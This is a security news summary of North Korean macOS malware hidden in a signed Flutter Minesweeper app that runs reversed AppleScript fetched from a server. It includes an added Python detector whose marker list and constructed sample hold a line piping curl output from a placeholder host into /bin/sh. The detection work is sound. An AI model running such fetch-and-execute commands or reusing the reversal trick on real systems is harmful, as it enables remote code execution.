North Korean Hackers Target macOS Using Flutter-Embedded Malware

November 12, 2024 at 08:39AM

North Korean threat actors have begun embedding malware in Flutter applications, in what Jamf Threat Labs reports is the first time this technique has been seen against macOS. The Flutter sample is a working Minesweeper game; variants written in Go and Python were also found. Given North Korea's history of social engineering against the cryptocurrency sector, Jamf suspects a known Lazarus sub-group. The apps were signed with a legitimate Apple developer ID and had passed Apple's notarization at the time; the signatures have since been revoked.

### Meeting Takeaways – November 12, 2024

**Subject:** Malware in Flutter Applications – North Korea Threat Actors

1. **Discovery of New Malware Tactic:**
– North Korean threat actors are embedding malware within Flutter applications; this is the first time the technique has been observed against Apple macOS.

2. **Source of Discovery:**
– Jamf Threat Labs identified this malware through artifacts uploaded to the VirusTotal platform.

3. **Language Variants:**
– The malware is developed using multiple programming languages, including Golang, Python, and Dart (via Flutter).

4. **Distribution Uncertainty:**
– It remains unclear how these malware samples are distributed to victims, or if they have been used in attacks. There are indications that these may be test cases.

5. **Targeted Industries:**
– Historical trends show that North Korean actors frequently engage in social engineering against cryptocurrency and decentralized finance sectors.

6. **Potential Group Involvement:**
– Jamf has not attributed the samples to a specific North Korean hacking group, but suspects the Lazarus subgroup known as BlueNoroff, based on the tradecraft and targeting.

7. **Malware Functionality:**
– The Flutter sample, an app named “New Updates in Crypto Exchange (2024-08-28)”, is a fully functional Minesweeper game with the malicious code embedded alongside it, so the lure pairs a crypto-themed filename with a playable game.

8. **Passing Apple’s Notarization:**
– The malicious apps were signed with legitimate Apple developer IDs and had been notarized, meaning they passed Apple’s notarization checks rather than evading them; the valid signature gave them an appearance of legitimacy on macOS. Apple has since revoked the signatures, so a valid developer signature alone should not be taken as evidence that an app is safe.

9. **Operational Mechanism:**
– Upon launch, the malware contacts a remote server and executes the AppleScript it receives. The script is delivered reversed (written backwards) and is reversed again before it runs, a simple trick aimed at defeating string-based detection of the payload.

10. **Continued Development:**
– The DPRK threat actors are actively developing malware with various programming languages to target cryptocurrency firms, suggesting a strategy of frequent updates to remain undetected.

11. **Expert Insight:**
– Jaron Bradley from Jamf Threat Labs highlighted that the use of Flutter provides obscurity, making detection more challenging.
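As an added example (not code from Jamf Threat Labs or the article), the reversal described in item 9 can be undone and flagged during triage of captured traffic from a suspect app. Everything about the script's contents is assumed: the marker list, the scoring threshold, the placeholder host name and the sample server responses are constructed for illustration, not indicators from the report.

```python
# Added triage example (not code from Jamf Threat Labs or the article).
# The page only says the loader executes AppleScript it receives "in a
# reversed format"; the marker list, scoring threshold and sample C2
# responses below are my own assumptions, constructed for illustration.

# AppleScript/shell fragments that are rare in ordinary text but common
# in a loader script. Assumed, not taken from the reported samples.
APPLESCRIPT_MARKERS = (
    "do shell script",
    "tell application",
    "end tell",
    "osascript",
    "display dialog",
    "curl ",
    "/bin/sh",
)


def reverse_script(payload: str) -> str:
    """Undo a character-level reversal of the script text."""
    return payload[::-1]


def marker_hits(text: str) -> int:
    """Count how many known markers occur in the text (case-insensitive)."""
    lowered = text.lower()
    return sum(1 for marker in APPLESCRIPT_MARKERS if marker in lowered)


def classify(payload: str) -> dict:
    """Decide whether a server response is AppleScript, reversed AppleScript, or neither.

    A payload is called reversed when the reversed text matches strictly more
    markers than the text as received, and at least two markers in total.
    """
    forward = marker_hits(payload)
    backward = marker_hits(reverse_script(payload))
    if backward > forward and backward >= 2:
        return {"verdict": "reversed_applescript",
                "script": reverse_script(payload), "hits": backward}
    if forward >= 2:
        return {"verdict": "plain_applescript", "script": payload, "hits": forward}
    return {"verdict": "unknown", "script": payload, "hits": max(forward, backward)}


def scan_responses(responses):
    """Run classify() over captured responses; return (index, verdict) for every hit."""
    findings = []
    for index, body in enumerate(responses):
        result = classify(body)
        if result["verdict"] != "unknown":
            findings.append((index, result["verdict"]))
    return findings


# Constructed sample of what a loader script might look like before reversal.
# The host name is a placeholder, not an indicator from the report.
SAMPLE_SCRIPT = 'do shell script "curl -s http://stage2.example.invalid/p | /bin/sh"'

# Constructed server responses: a benign-looking status reply, the reversed
# script, and a plain AppleScript fragment.
SAMPLE_RESPONSES = [
    '{"status": "ok", "update": "none"}',
    reverse_script(SAMPLE_SCRIPT),
    'tell application "Finder" to activate\nend tell',
]

if __name__ == "__main__":
    for index, verdict in scan_responses(SAMPLE_RESPONSES):
        print(index, verdict)
        print("  decoded:", classify(SAMPLE_RESPONSES[index])["script"])
```

The point of checking both orientations is that reversing the script defeats naive string matching on the response body, but costs the detector nothing more than a second pass over the reversed text. In practice the same function would be pointed at whatever the suspect app actually hands to the AppleScript interpreter, which the page does not describe in detail.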

**Recommendation:** Treat unsolicited applications related to cryptocurrency and finance, including games and “update” packages, as suspect even when they carry a valid Apple developer signature, since these samples were signed and notarized at the time they were found. Verify the origin of any such app before running it, keep endpoint protection current, and watch for newly installed apps that run AppleScript and make unexpected outbound connections.
